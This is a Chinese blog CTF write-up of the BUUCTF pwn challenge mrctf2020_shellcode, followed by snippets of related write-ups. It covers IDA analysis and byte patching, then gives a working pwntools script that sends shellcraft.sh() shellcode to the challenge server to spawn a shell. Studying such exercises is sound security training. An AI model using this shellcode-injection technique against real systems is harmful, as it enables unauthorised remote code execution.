BUUCTF pwn——mrctf2020_shellcode

最新推荐文章于 2025-03-11 13:09:32 发布
最新推荐文章于 2025-03-11 13:09:32 发布
阅读量325 收藏 1
点赞数 1
分类专栏: [个人向]做题练习WP 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45770420/article/details/130613985
版权
文章描述了一个pwn类型的挑战,通过ida分析二进制文件的main函数,发现存在安全限制,但可以利用shellcode。作者使用ida进行反编译时遇到错误,然后通过patch程序改变字节以避免错误,并提供了python脚本进行远程或本地的exploit执行,目标是获取shell并读取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

checksec

在这里插入图片描述

运行

直接输入就行
在这里插入图片描述

ida

main函数

read限制了长度,没有超过buf的大小,不存在溢出
由题,可以直接放shellcode试试
在这里插入图片描述

反编译报错:Decompilation failure: 11DD call analysis failed

如图
在这里插入图片描述

1. 跳转到地址

在这里插入图片描述

2. Patch program(修补程序)→Change byte(单字节修改)

将前两对十六进制改成90 90之类
在这里插入图片描述

然后,可以F5了

可以自己在原汇编和f5处加入注释,提示原来是什么
在这里插入图片描述

利用思路

ret2shellcode

代码

'''
@Author       : 白银
@Date         : 2023-05-11 08:50:24
@LastEditors  : 白银
@LastEditTime : 2023-05-11 08:52:25
@FilePath     : /pwn/mrctf2020_shellcode.py
@Description  : https://buuoj.cn/challenges#mrctf2020_shellcode
@Attention    : 
@Copyright (c) 2023 by 白银 captain-jparrow@qq.com, All Rights Reserved. 
'''

from pwn import *
# from libcfind import *

set_arch = 0  # set_arch中,int,0→amd64,1→arm64,2→i386
pwnfile = './mrctf2020_shellcode'  # pwnfile, str,二进制文件
if_remote = 1  # if_remote,int,1→远程,别的数字→本地
# 打本地,if_remote改别的数字就可以,最后两个参数随便改

# set_arch = 0
if set_arch == 0:
    context(log_level='debug', arch='amd64', os='linux')
elif set_arch == 1:
    context(log_level='debug', arch='arm64', os='linux')
elif set_arch == 2:
    context(log_level='debug', arch='i386', os='linux')

print(context)
# context(log_level='debug', arch='i386', os='linux')
# pwnfile = './pwn1'
elf = ELF(pwnfile)

if if_remote == 1:
    # io = remote("192.168.61.139", 8888)
    # io = remote(remote_addr, remote_port)
    io = remote("node4.buuoj.cn", 27184)
    # libc = ELF('/home/usrname/Desktop/libc.so.6')
    if set_arch == 0 or set_arch == 1:
        libc = elf.libc
        # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
        # libc = ELF('/home/usrname/Desktop/2.23x64libc.so.6')
    else:
        libc = elf.libc
        # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
        # libc = ELF('/home/usrname/Desktop/2.23x86libc.so.6')
else:
    io = process(pwnfile)
    # 本地用
    # elf = ELF(pwnfile)
    libc = elf.libc
    # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
    rop = ROP(pwnfile)
    # 本地调试用
    gdb.attach(io)
    pause()

payload = flat([asm(shellcraft.sh())])
io.sendlineafter('Show me your magic!', payload)

io.interactive()

拿到shell,cat flag

在这里插入图片描述

mrctf2020_shellcode
K1ose的博客
04-21 690
拿到附件后,先file一下; 看到是个64bit的程序,拖到ida64里; 再checksec一下附件,看看保护情况; 栈没有保护,有可读可写可执行的段; 可以dbg调试一下,看看具体情况; 可以看到有一个段可读可写可执行,栈也确实没有什么保护; 现在去IDA分析一下程序; 变量参数如下 可以看到前几行在设置标准输入输出和错误; 接着输出"Show me your magic!"; 然后read一个400bytes的数据; 接着是关键代码,将$eax赋值给[rbp+var_4],接着与0进行比较
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1545
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
[BUUCTF]PWN——mrctf2020_shellcode
mcmuyanga的博客
01-08 1729
mrctf2020_shellcode 附件 步骤: 例行检查,64位程序,开启了relro和pie,没有nx,肯定是用shellcode最方便了 本地试运行一下,看看大概的情况 64位ida载入,根据运行时看到的字符串,迅速定位到关键程序,但是没法f5成伪代码,直接看汇编 栈大小是0x410,读入了0x400,无法造成溢出覆盖返回地址 不过好像这边分析了用处也不大,直接利用pwntools生成shellcode发送即可 shellcode=asm(shellcraft.sh()) exp fr
BUUCTF Pwn mrctf2020_shellcode WP
最新发布
qq_33348179的博客
03-11 169
按理说构不成溢出 但是下面的汇编:跳跃到11D6 将buf的内容存到rax 并进行call。进行一次puts操作 再进行一次读取0x400字节的read 存到buf。先创建了buf(大小0x410) var4(大小0x4) 两个变量。没开NX 开了PIE。
BUUCTF--mrctf2020_shellcode1
qq_30528603的博客
01-27 801
正在我想如何覆盖返回地址的时候,发现题目直接帮你搞好了。取buf的的地址(栈上)然后跳转到buf位置执行代码。主函数中无法反汇编,那么我们直接看汇编代码。其实很简单,通过系统调用执行puts函数,然后执行read函数。这是一题64位的shellocde题,没啥花招入门题。
mrctf2020_shellcode 1
weixin_74861133的博客
03-10 386
关键代码从lea那开始到call _read是调用了read函数,从rbp+buf处输入0x400的数据,然后将返回值(read读取的字符数)存在eax中,后面会将eax中的值与0比较,如果大于0,就会跳到loc_11D6处执行,跳转到rbp+buf处执行,所以思路很简单,就是直接使用pwntools中的工具shellcraft.sh()生成shellcode,然后直接将其读入就可以夺权了。
mrctf2020_shellcode_revenge
K1ose的博客
04-24 874
下载附件,checksec一下; 存在可读可写可执行的段; 看一下IDA pro的汇编; 和先前的题目类似,先read也给0x400bytes的字符串,然后compare一下eax和0; jg表示jump if greater,如果eax>0则跳转,否则eax为0,跳到另一个地址; 接下来看到很多判断语句,截取其中一部分进行分析; 这里比较al和`的大小,jle表示jump if less or equal,即小于等于; 如果al<=60h,则跳转到11DA,如果al<=7Ah,则跳
mrctf2020_shellcode----wp
2301_80168334的博客
07-08 871
也就是程序会从标准输入读取数据放入栈中,再跳转到栈中,并且从checksec可知栈是可执行的。可以知道开始是定义了buf是拥有0x410个字节的数据。接着向下分析可以知道是有三个setbuf函数,该函数是进行初始化数据的函数,接着是一个puts函数,接着有一个read函数,这个read函数的开始是0,接着是有0x400个字符可以进行读取。查看汇编代码的时候每一个函数是从下向上读取,所以可以知道read函数转化为read(0,&buf,0x400h),题目初始给的buf是0x410,所以不能实现栈溢出。
mrctf2020_shellcode详解
勿山几已
06-09 865
简单演示mrctf2020_shellcode解题步骤
mrctf2020_shellcode_revenge(不用仔细分析汇编)
CsCN_的博客
07-10 457
日常拖进IDA一看,发现不能反编译,原因是0x124D位置有个call rax 然后看了一下汇编,发现又臭又长,由于本人还没有学汇编,有些地方看不懂 所以我干脆直接在IDA里面改汇编,把call rax改成call main就能反编译了 一目了然 稍加分析便能发现输入字符必须要在(47,122]里,也就是从0到z 图源:百度百科,侵删 后面的问题就变成怎样把用这些字符写出shellcode了 看了一些大佬们用alpha3重定向一下就能搞出shellcode,详见大.
[BUUCTF]PWN——mrctf2020_shellcode_revenge(可见字符shellcode
mcmuyanga的博客
03-15 4489
mrctf2020_shellcode_revenge 例行检查,64位程序,开启了RELRO和PIE 本地运行看一下大概的情况 64位ida载入,没法f5,直接看汇编 jg大于则跳转,jl小于则跳转,jump无条件跳转 要让程序继续执行下去,肯定是跳转loc_11AC loc_123A loc_11B8 cdqe使用eax的最高位拓展rax高32位的所有位 movzx则是按无符号数传送+扩展(16-32) EAX是32位的寄存器,而AX是EAX的低16位,AH是ax的高8位,而AL是ax的低
[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode)(内涵peak小知识)
Y_peak的博客
03-29 1447
[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode) 检查了下保护发现NX 没有开,肯定要自己写shellcode呀。 不过这道题,刷新了我的认知。众所周知,手写的shellcode里面肯定有很多不可见字符。第一次碰到可见的shellcode。 看下IDA, 不能反汇编不过问题不大,没事. 个人建议,看汇编的时候,建议看流程图,更加直观 将shellcode写入,那个buf 不过下面肯定大于0呀.rbp + var_8是我们输入字符串的长度.发生转
[MRCTF2020] - Web
qtL0ng的博客
07-01 1172
[MRCTF2020]套娃 打开题目查看源码 <!-- //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b
关于IDA反编译Decompilation failure: 8048801: call analysis failed的解决方法
、moddemod
06-17 2908
他这个问题就是0x8048801这个地址的地方分析有问题,所以跟踪(快捷键字母g)过去看一下 跟进去按F5然后回来就可以了 再回到你要反编译的函数,就正常了!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Captain杰派罗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值